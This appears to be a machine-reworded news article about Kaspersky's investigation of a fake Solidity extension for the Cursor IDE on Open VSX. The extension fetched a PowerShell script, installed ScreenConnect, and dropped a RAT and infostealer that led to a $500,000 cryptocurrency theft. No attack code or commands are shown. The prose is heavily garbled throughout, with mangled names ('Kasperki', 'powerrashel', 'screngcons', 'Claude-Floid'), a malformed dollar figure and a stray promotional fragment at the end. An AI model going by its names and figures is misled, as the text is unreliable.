Cursor AI IDE Code Editor caused a fake extension remote access tools and infected equipment with infostals, which, in a case, caused a theft of $ 500,000 in cryptocurrency from a Russian Crypto Developer.
Cursor AI IDE is an AI-managed development environment based on Microsoft’s visual studio code. This includes an option of visual studio marketplace support for Open VSX, which allows you to install VSCODE-compatible extension to expand the functionality of the software.
Kaspersky Reports He was called to investigate a security incident, where a Russian developer, who worked in Cryptocurrency, reported that $ 500,00 was stolen from his computer in Crypto. There was no antivirus software installed in the machine, but it was called clean.
George Kucherin, a security researcher for Kaspersky, obtained an image of the hard drive of the device, and after analyzing it, a malicious JavaScript file named Extension.JS is located in .cursor/Extensions Directorate.
The extension was named “Solidity Language” and was published on the Open VSX Registry, which claims to be a Syntax Highlighting tool to work with the Ethereum Smart Contracts.
Although plugin implemented validity Solidity syntax highlighting extensionThis actually executed an additional malicious payload to download an Angelic (.) SU from a remote host to a powershell script.
Source: Kasperki
The remote powerrashel script was checked whether the remote management tool screens was already established, and if not, another script was executed to install it.
Once the screens was established, the danger actors received full remote access on the developer’s computer. Using the screenconnect, the danger actor uploaded and executed the VBScript files, which was used to download the additional payload in the device.
In the attack, the final script downloaded a malicious executable from Archive (.) Org, which was a loader known as VMDETECTOR, which was established:
- Quaser Rat: A remote access is capable of executing the command on trojan devices.
- Purelogs theft: An infostealing malware that steals credentials and authentication cookies from web browsers, as well as steals cryptocurrency wallet.
According to Kasperki, Open VSX showed that the extension was downloaded 54,000 times before being removed on 2 July. However, researchers believe that this install count was artificially inflated to give it a sense of validity.
A day later, the attackers published an almost identical version under the name “Solidity”, extending the installed count to about two million for this extension.
Source: Kasperki
Kaspersky says that the actor of danger was able to rank his expansion more than one legitimate in open Vsx search results by gaming and inflated install count. The victim established malicious extensions, thinking that it was valid.
Researchers published Microsoft’s Visual Studio Code Marketplace in a similar extension called “Solabot”, “Mount-Ath”, and “Blankebesxstnion”, which also executed a powerful script to establish screngcons and infosellers.
Kasparki has warned that developers should be careful to download package and extension from open repository as they have become a common source of malware infections.
“Malicious packages continue to pose a significant threat to the crypto industry. Today many projects rely on the open-source tool downloaded from the package repository,” Kaspasky is the conclusion.
“Unfortunately, packages from these repository are often a source of malware infections. Therefore, we recommend excessive caution when downloading any equipment. Always verify that the package you are downloading is not fake.”
“If a package does not work as advertised after installing it, be suspicious and check the downloaded source code.”
While cloud attacks can be more sophisticated, the attackers still succeed with surprisingly simple techniques.
Drawing by the detection of Vij in thousands of organizations, this report reveals the 8 major techniques used by Claude-Floid danger actors.
